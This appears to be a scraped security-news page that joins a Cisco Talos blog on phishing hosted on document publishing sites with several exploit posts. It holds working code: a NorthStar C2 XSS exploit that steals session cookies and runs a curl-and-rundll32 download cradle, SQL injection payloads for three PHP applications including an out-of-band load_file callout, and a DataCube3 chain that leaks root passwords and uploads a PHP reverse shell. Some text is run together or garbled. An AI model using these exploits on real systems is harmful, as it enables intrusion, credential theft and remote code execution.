Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks.

Wednesday, March 13, 2024 08:00

*   Cisco Talos Incident Response (Talos IR) has observed the ongoing use of legitimate digital document publishing (DDP) sites for phishing, credential theft and session token theft during recent incident response and threat intelligence engagements.
*   Hosting phishing lures on DDP sites increases the likelihood of a successful phishing attack, since these sites often have a favorable reputation, are unlikely to appear on web filter blocklists, and may instill a false sense of security in users who recognize them as familiar or legitimate.
*   DDP sites allow adversaries to quickly deploy and decommission malicious documents on a single platform. Talos IR also observed an adversary move between DDP sites within a short period.

Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks. Threat actors have used a similar tactic of deploying phishing lures on well-known cloud storage and contract management sites such as Google Drive, OneDrive, SharePoint, DocuSign and Oneflow. However, DDP sites could represent a blind spot for defenders, because they are unfamiliar to trained users and unlikely to be flagged by email and web content filtering controls. Recent malicious activity observed across these platforms underscores the need for security teams to ensure that phishing protections and user awareness training programs consider these and similar sites.

**Background and observations**

 “Digital Document Publishing sites” refers to websites that allow users to upload and share PDF files in a browser-based flipbook format. Visitors can view an entire PDF by flipping from page to page without downloading the document, and some DDP sites offer features that allow other types of interaction with the document. Examples of DDP sites include Publuu, Marq, FlipSnack, Issuu, FlippingBook, RelayTo and SimpleBooklet.

The sites discussed in this blog are not malicious. Rather, they are being abused by threat actors.

**Delivery mechanism**

Threat actors integrate DDP sites as a secondary or intermediate stage of the attack chain, which follows tried-and-true phishing methods.

*   The victim receives an email containing a link to a document hosted on a legitimate DDP site. The email’s subject and/or body often includes the phrase “New Document from \[sender organization\],” and leaves the “To” header blank. Instead, the actors load the target list into the “BCC” field.
*   The DDP-hosted document includes a link to an external, adversary-controlled site.
*   When clicked, the link either moves the victim directly to the adversary-controlled site, or through a series of redirects. Talos IR also observed the inclusion of Cloudflare CAPTCHAs as part of some redirects, an adversary technique reported by Cofense, Netskope and other security teams over the past six months.
*   The victim arrives at the adversary-controlled site, which mimics a legitimate authentication page and is designed to capture user credentials or session tokens during authentication.

Attacks leveraging DDP sites for credential and session token theft often take place through unauthorized access to another legitimate email inbox. In a sort of “cascading” business email compromise (BEC) process, the threat actor creates infrastructure and phishing lures to target a specific victim, then leverages that victim’s established connections to conduct follow-on attacks against other organizations. A portion of the infrastructure created for the original target may be reused, while other portions are recreated to increase the likelihood of success during the subsequent attacks. 

**Lure customization**

DDP sites offer custom capabilities that lend credence to a phishing attack. Not only can the threat actor customize the uploaded phishing document, the web page hosting that document can also be modified. Page customization options include changing the background, banner, border or HTML Title tag. These quick configurations create more convincing lures and are likely to garner a higher click-through rate to the credential harvesting page. 

DDP-hosted lure customization observed during investigation ranged from pages listing the organization name only in the HTML Title tag, to a highly customized lure and landing page combination targeting users of a Canadian telecom provider. In the latter case, the final credential harvesting page was a near replica of the provider’s legitimate user login page, though it was hosted on an unrelated webwave\[.\]dev subdomain. 

**Historical trends**

Expanding the scope of the investigation to include historical data reveals a possible trend where threat actors migrate between DDP sites or rapidly activate and deactivate similar campaigns on the same site over time. For example, Talos IR observed a cluster of activity on SimpleBooklet from late October to early November 2020, and another on RelayTo in early September 2023. More recently, an adversary was observed operating the same credential-harvesting attack, first on Publuu, then later Issuu. 

**Adversary advantages create challenges for defenders**

DDP sites create advantages for threat actors seeking to thwart contemporary phishing protections. The same features and benefits that attract legitimate users to these sites can be abused by threat actors to increase the efficacy of a phishing attack. Given some of these advantages, threat actors may find DDP sites as useful as creating spoofed domains or compromising legitimate sites for phishing and credential theft.

**DDP sites offer low-cost, transient file hosting**

Many DDP sites offer either a free tier or a no-cost trial period where a defined number of files can be published for a limited time. No-cost trial periods usually require only limited personal identifiers and no payment methods. Threat actors can quickly and easily create multiple free accounts, with a varying number of malicious pages per account.

Some DDP sites also allow a link expiration to be set for published content. This feature creates a “set it and forget it” capability for threat actors, who are no longer required to closely track where phishing documents have been deployed so they can be decommissioned. Instead, a link expiration date and time is configured during page creation, ensuring the content will be rendered unavailable automatically, usually after only a short time.

Talos IR observed instances where an adversary launched, then disabled a DDP page in fewer than 24 hours, and others where the DDP page was left active but the final landing page on the adversary-controlled domain was removed through DNS fast fluxing or another mechanism.

This transient nature of DDP pages creates challenges for security teams and complicates the incident response process. While it’s possible to detect, create internal alerts for, and/or notify security personnel about a DDP-hosted lure, the brief availability of the pages creates a compressed response time for defenders. Understanding the theme of the lure, the associated adversary-controlled domains, and the intent of the attack in such a short time may be difficult, even for experienced security teams.

**DDP sites usually have a favorable web reputation.**

The ratio of legitimate to compromised pages hosted on DDP sites is likely quite low. While that ratio seemed to vary by DDP provider, Talos IR found that most pages created recently across all DDP sites hosted legitimate content. Unless this trend continues to shift toward hosting greater volumes of malicious content, these sites will maintain a favorable reputation score and are less likely to be included in automated blocklists. 

A favorable web reputation score may also mislead users who investigate the DDP site using popular open-source intelligence tools or a basic internet search, leading to higher click and credential capture rates than sites with an unknown or poor reputation.

**Site**

**Domain Registration**

**Umbrella Unique Visitors Score\***

**Umbrella Reputation Score\*\***

**Publuu**

2019-02-28 (IS)

63

53 (Medium Risk)

**Marq**

2004-06-19 (IS)

76

9 (Low Risk)

**FlipSnack**

2010-06-03 (US)

96

11 (Low Risk)

**Issuu**

2007-04-19 (GB)

100

9 (Low Risk)

**RelayTo**

2013-12-02 (US)

53

58 (Medium Risk)

_\* Umbrella’s Unique Visitors Score is included to illustrate estimated traffic volume per site as of Feb. 2, 2024._

_\*\* Reputation Score as of Feb. 2, 2024._

**DDP productivity features may inhibit malicious link detection.**

Talos IR found that productivity features on at least one DDP site inhibited traditional methods of extracting the true URL from a phishing link. During the investigation of a malicious document hosted on Publuu, a custom sub-menu was displayed when the user right-clicked on the URL. While this sub-menu included options that would benefit legitimate users, it did not provide a clear option to copy the URL behind the “View Online PDF” hyperlink. Further, no tooltip popups appeared to show the URL when hovering over the link. 

**Case studies**

Two recent Talos IR engagements involved the use of a DDP site as part of potential credential and session token-harvesting attacks.

**Publuu**

Several individuals at the targeted organization received phishing emails from a compromised email address belonging to a trusted third-party vendor with the subject, “New Document from \[third-party vendor\]”.

The link included in the body of the email led to a Publuu flipbook, with a URL like https://publuu[.]com/flip-book/[6_digit_identifier]/[6_digit_identifier]. The phishing document was a generic, widely used file observed in similar attacks on other DDP sites. However, while the phishing document was reused, the adversary had modified the Publuu page with the sender organization’s name to lend authenticity to the document.

Clicking the “VIEW ONLINE PDF” link directed the user to a Cloudflare CAPTCHA, a technique described in the publications by Cofense and Netskope linked above. Use of the CAPTCHA likely has a dual purpose, as it both protects the credential harvesting page from automated access while giving the impression of a legitimate site to users who fall victim to the phishing link.

After completing the CAPTCHA, the victim is directed to a convincing replica of a Microsoft 365 authentication page. The URL for the page contains a lengthy alphanumeric string, which may act as an identifier for the visitor. The adversary-controlled domain associated with the authentication page was atlas-aerspace[.]onlineextracted. The customization of the original Publuu page to the target organization in contrast to this unrelated spoofed domain suggests this incident may have been part of a cascading BEC attack.  

Talos IR later identified an attack chain hosted on the Issuu DDP site with similar indicators. The phishing document was nearly identical, though, unlike the Publuu link, this link URL leveraged the Google AMP to Cloudflare CAPTCHA flow described in the Cofense blog. The credential harvest page was ultimately located at the domain aerospace-atlas[.]online and included the same identifier-style URL string as the one observed with the atlas-aerspace[.]online90 days domain.

In aggregate, the following similar domains – all hosted by Cloudflare – were registered within 90 days. The first two domains were found to be associated with phishing lures hosted on DDP sites, suggesting an effort to target users of the legitimate atlas-aerospace[.]com domain.

*   aerospace-atlas[.]online (registered Jan. 24, 2024)
*   atlas-aerspace[.]online (registered Dec. 19, 2023)
*   atlas-aerspace[.]com (registered Oct. 25, 2023)

Talos provided notification through established channels so affected organizations could review and address this activity.

**Marq**

Talos IR also responded to an incident involving the Marq DDP site. The Marq page hosting the phishing document had already been deactivated, but Talos IR used other forensic data to determine the URL of the associated credential harvesting page. The first part of that URL was https[:]//mvnwsenterprise[.]top:443/aadcdn.msauth.net/.

While the Marq page could not be accessed, Talos IR identified similar pages through open- and closed-source intelligence. These pages were customized to show the sender organization in the HTML Title tag (displayed in the browser tab) but otherwise used an identical “Microsoft365 Online Fax” lure. Unlike some activity clusters on other DDP sites, each page was configured with a unique URL using the .top top-level domain, such as onedrivesmncs[.]top, onedrivemwsamc[.]top, and 347nsm239mws934[.]top. Another common characteristic was the presence of the URL query string tkmilric in all URLs embedded in the phishing document. 

Once clicked, the link passed the user to the spoofed Microsoft authentication page, which resided at the redirect.cgi path of the unique \`.top\` domain. The URL query string for this page included a “ref” parameter, which contained a Base64 and URL encoded value. An example of the decoded value is:

https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https://outlook.office.com/owa/&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code id_token&scope=openid&msafed=1&msaredir=1&client-request-id=**[REDACTED]**&protectedtoken=true&claims={"id_token":{"xms_cc":{"values":["CP1"]}}}&nonce=**[REDACTED]**&state=**[REDACTED]**

The value 00000002-0000-0ff1-ce00-000000000000 found in the client_id and resource parameters is the Microsoft Application ID for Office 365 Exchange Online. The claims string {"id_token":{"xms_cc":{"values":["CP1"]}}} is a required component for a client application to communicate its capabilities to Microsoft Entra ID in an OAuth 2.0 authorization flow. These characteristics likely indicate a campaign to capture session tokens for Microsoft 365 components using the same lure and customized or DGA-generated domains.

**Other DDP Sites**

Following these investigations, Talos IR identified similar activity on other DDP sites. The following examples are provided to demonstrate similarities across DDP sites and are not related to any ongoing or prior Talos IR investigations.

**Flipsnack**

Talos IR identified at least two lure formats used recently on FlipSnack – one eFax PDF-themed lure, and one SharePoint PDF-themed lure. Both landing pages had been removed by the adversary at the time of Talos IR’s review, but the URL for the adversary-controlled page associated with the SharePoint lure (afurrytailwedding[.]com/cure/MSthOffice/index.phpexcept) could indicate a potential Microsoft 365 credential harvesting effort. Neither lure had been customized to target a specific victim. 

**Issuu**

Malicious documents found on Issuu were very similar to those observed on Publuu, except for minor details like a “Reference” number and the link URL. Of the two links tested by Talos IR, one was redirected through an intermediary site before reaching the landing page. The other leveraged the Google AMP and Cloudflare CAPTCHA flow reported by Cofense. Again, the landing pages for both examples had been removed by the adversary at the time of Talos IR’s review.

**RelayTo**

Talos IR located at least two different phishing lures that had been deployed to the RelayTo site in early September 2023. One of these lures was published repeatedly from multiple RelayTo accounts with modifications to only the name of the associated organization. The link in each lure – https[:]//secure-docsx[.]com/efgh5678 – was the same. The secure-docsx[.]combefore the domain had been registered a week this activity began and was followed by the creation of the secure-docu[.]com domain, with which it shared registrant details.

**SimpleBooklet**

Talos IR could not locate a malicious page on the SimpleBooklet site that had not already been deactivated. However, a review of related URLs in VirusTotal suggests that an adversary made prolific use of this site for phishing and possible credential theft from October 2020 through January 2021.

**Defender actions**

Defenders should consider the following actions to help defend against phishing attacks that leverage DDP sites.

*   Block common DDP sites via border security devices, endpoint detection and response (EDR) like Cisco Secure Endpoint, web content filtering, and/or DNS security controls if access to these sites is not required for normal business operations. If blocking these sites will disrupt normal operations, develop a procedure to ensure malicious domains identified in DDP-hosted phishing lures can be quickly blocked.
*   Configure email security controls to detect and alert on links in emails containing common DDP site URLs.
*   Leverage threat intelligence to quickly identify newly created sites related to known threats – in this case, new DDP sites that may be leveraged by threat actors.
*   Monitor for behavioral trends within the organization’s internal environment that could indicate coordinated malicious activity, including activity to blocked sites.
*   Update user security awareness training to include information about DDP sites and other cloud-hosted phishing attack methods. Reinforce a “see something, say something” mentality when users are uncertain about a site’s legitimacy.

End users can also support defenders by remaining vigilant for documents shared over unusual or uncommon sites, even if those sites are legitimate and have a favorable reputation, and by following their organization’s guidelines for reporting suspicious emails.

Threat actors leverage document publishing sites for ongoing credential and session token theft

NorthStar C2 agent version 1.0 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This cross site scripting payload can be leveraged to execute commands on NorthStar C2 agents.

    # Exploit Title: NorthStar C2 agent RCE via stored XSS# Date: 2024-03-11# Exploit Author: @_chebuya# Software Link: https://github.com/EnginDemirbilek/NorthStarC2# Version: v1.0# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-28741# Description: NorthStar C2 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page.  This XSS can be leveraged to execute commands on NorthStar C2 agents# Blog: https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/from http.server import BaseHTTPRequestHandler, HTTPServerfrom bs4 import BeautifulSoupimport requestsimport base64import threadingimport timeimport osclass Collector(BaseHTTPRequestHandler):    def do_GET(self):        cookie = self.path.split("=")[1]        print("Cookie: " + cookie)        self.send_response(200)        self.end_headers()        self.wfile.write(b"")        background_thread = threading.Thread(target=steal_agents, args=(cookie,))        background_thread.start()        self.server.shutdown()def agent_execute_command(agent_id, csrf_token, headers, command):    data = {        'slave': agent_id,        'command': command,        'sid': agent_id,        'token': csrf_token    }    r = requests.post(target_url + '/functions/setCommand.nonfunction.php', headers=headers, data=data)    while True:        r = requests.get(target_url +  f"/getresponse.php?slave={agent_id}", headers=headers)        if len(r.text) != 0 or command == "die":            break                time.sleep(1)def steal_agents(cookie):    headers = {        "Cookie": f"PHPSESSID={cookie}"    }    r = requests.get(target_url + "/clients.php", headers=headers)    soup = BeautifulSoup(r.text, 'html.parser')    rows = soup.find_all('tr')    agent_ids = []    hostnames = []    for row in rows:        cells = row.find_all('td')        if len(cells) != 9:            continue        status = cells[7].text.strip()        if status != 'Online':            continue        agent_ids.append(cells[1].text.strip())        hostnames.append(cells[5].text.strip())    script_tags = soup.find_all('script')    csrf_token = None    for script_tag in script_tags:        if 'csrfToken' in script_tag.text:            csrf_token = script_tag.text.split('"')[1]            break    if csrf_token:        print("CSRF Token:", csrf_token)    else:        print("CSRF Token not found")        return    for i in range(len(agent_ids)):        agent_id = agent_ids[i]        hostname = hostnames[i]        print(f"Stealing {hostname} ({agent_id})...")        print("Enabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "enablecmd")        print(f"Running sliver cradle: {cradle_command}")        agent_execute_command(agent_id, csrf_token, headers, cradle_command)        print("Disabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "disablecmd")        print("Sending suicide to slave")        agent_execute_command(agent_id, csrf_token, headers, "die")        print("Exploit finished, exiting")    os._exit(0)def xor_encryption(text, key):    encrypted_text = ""        for i in range(len(text)):        encrypted_text += chr(ord(text[i]) ^ ord(key[i % len(key)]))        return encrypted_textdef generate_sid(sid):    encrypted_sid = xor_encryption(sid, "northstar")    return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()def exploit(target_url, callback_url):    target_url = target_url.rstrip("/") + "/login.php"    protocol = callback_url.split(":")[0] + "://"    host = callback_url.split("/")[2].split(":")[0]    h1, h2 = host[:len(host)//2], host[len(host)//2:]        if callback_url.count(":") == 2:        port = callback_url.split(":")[2]    else:        if protocol == "https://":            port = "443"        else:            port = "80"    sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]    for sid in sid_payloads:        print(sid)        params = {            'sid': generate_sid(sid)        }        requests.get(target_url, params=params, verify=False)def run(port):    server_address = ('', int(port))    httpd = HTTPServer(server_address, Collector)    print(f'Server running on port {port}')    httpd.serve_forever()cradle_command = r"curl http://192.168.1.6:8000/stager.dll > c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"callback_host = "192.168.1.6"callback_port = "8080"target_url = "http://192.168.1.4:80"callback_url = f"http://{callback_host}:{callback_port}"print("Sending malicious agent registrations...")exploit(target_url, callback_url)print("Registrations finished, waiting for execution...")run(callback_port)

NorthStar C2 Agent 1.0 Cross Site Scripting / Remote Command Execution

Human Resource Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Abdulhakim Oner in March of 2023.

    # Exploit Title: Human Resource Management System - SQL Injection# Date: 13-01-2024# Exploit Author: Srikar ( Exp1o1t9r )# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip# Version: 1.0 (Monday, October 10, 2022 - 13:37)# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0# Vulnerable URL and Parameter:URL:Parameter: employeeid=2 The following payloads successfully identified SQL injectionvulnerabilities:employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNIONALL SELECTNULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--- *# Response:MySQL: 10.4.32-MariaDBUsers:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*

Human Resource Management System 1.0 SQL Injection

RUPPEINVOICE version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: RUPPEINVOICE-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/09/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''OR NOT 6356=6356 AND 'Eocq'='Eocq&password=g7J!m3v!W2&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''AND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND'bCQt'='bCQt&password=g7J!m3v!W2&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/RUPPEINVOICE-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/ruppeinvoice-10-multiple-sqli.html)## Time spend:00:35:00

RUPPEINVOICE 1.0 SQL Injection

DataCube3 version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'# Date: 7/28/2022# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)# Vendor Homepage: https://www.f-logic.jp# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf# Version: Ver1.0# Tested on: DataCube3 version 1.0 (Ubuntu)# CVE : CVE-2024-25830 + CVE-2024-25832# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file uploadfrom __future__ import print_function, unicode_literalsfrom bs4 import BeautifulSoupimport argparseimport requestsimport jsonimport urllib3import reurllib3.disable_warnings()def banner():  dataCube3Logo = """         ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓      ▒▒▒▒▒▒▒▒██        DataCube3   Ver1.0      █F-logic▓▓      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓      ▒▒▒▒▒▒▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓      ▒▒▒▒▒▒▒▒██                                ██▓▓████▓▓      ▒▒▒▒▒▒▒▒██        ██             ██       ██▓▓████▓▓      ▒▒▒▒▒▒▒▒██        █████████████████       ██▓▓▓▓▓▓▓▓        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓                                                                                                                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mDataCube3 exploit chain reverse shell\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))def extractRootPwd(RHOST, RPORT, protocol):  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)  try:    response = requests.get(url, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:      print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')    scriptTag = str(soup.find_all('script')[12]).replace(' ', '')    rawLeakedData = re.findall('configData:.*,', scriptTag)[0]    jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))    adminPassword = jsonLeakedData[12]['value']    rootPassword = jsonLeakedData[14]['value']    print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))    return rootPassword  except:    print('[ERROR] Can\'t grab the DataCube3 version...')def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):  print('[INFO] Generating DataCube3 auth cookie ...')  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)  data = {    'user_id': 'root',    'user_pw': rootPassword,    'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'  }  try:    response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:      print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')      exit()    authCookie = response.cookies.get_dict()     print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))      return authCookie  except:    print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):  print('[INFO] Extracting Accesstime ...')  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)  try:    response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:      print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')      exit()    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')    accessTime = soup.find('input', {'name': 'accesstime'}).get('value')    print('[INFO] AccessTime value: {}'.format(accessTime))    return accessTime  except:    print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):  print('[INFO] Injecting PHP reverse shell script ...')  filename='rvs.php'  payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)  data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��è¿½å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)  headers = {      'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'  }  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)  try:    response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:        print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')        exit()    shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)    print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))    return shellURL  except:    print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')def execReverseShell(shellURL):  print('[INFO] Executing reverse shell...')  try:    response = requests.get(shellURL, allow_redirects=False, verify=False)    print('[INFO] Reverse shell successfully executed.')    return  except Exception as e:      print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')      return Falsedef main():  banner()  args = parser.parse_args()  protocol = 'https' if args.RPORT == 443 else 'http'  rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)  authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)  accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)  shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)  execReverseShell(shellURL)if __name__ == '__main__':  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)  parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)  parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)  parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)  parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)  main()

DataCube3 1.0 Shell Upload

NDtaskmatic version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: NDtaskmatic-1.0-by-Mayuri.K Multiple-SQLi## Author: nu11secur1ty## Date: 03/07/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected. Please manually confirm it after you checkmanually the POST, GET, or other requests...The payload from the puncher_SQLi_bypass_authentication module wassubmitted successfully after the test.The task_id is vulnerable to SQLi attacks, the attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: task_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: task_id=39' AND (SELECT 8670 FROM(SELECTCOUNT(*),CONCAT(0x7176767871,(SELECT(ELT(8670=8670,1))),0x717a717a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# FrpM    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: task_id=39';SELECT SLEEP(7)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=39' AND (SELECT 9072 FROM (SELECT(SLEEP(7)))RtEq)# XSsn---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/NDtaskmatic-1.0-by-Mayuri.K)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/ndtaskmatic-10-by-mayurik-multiple-sqli.html)## Time spend:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

NDtaskmatic 1.0 SQL Injection

The Rich Filemanager feature of Artica Proxy versions 4.40 and 4.50 provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. This provides an unauthenticated attacker complete access to the file system.

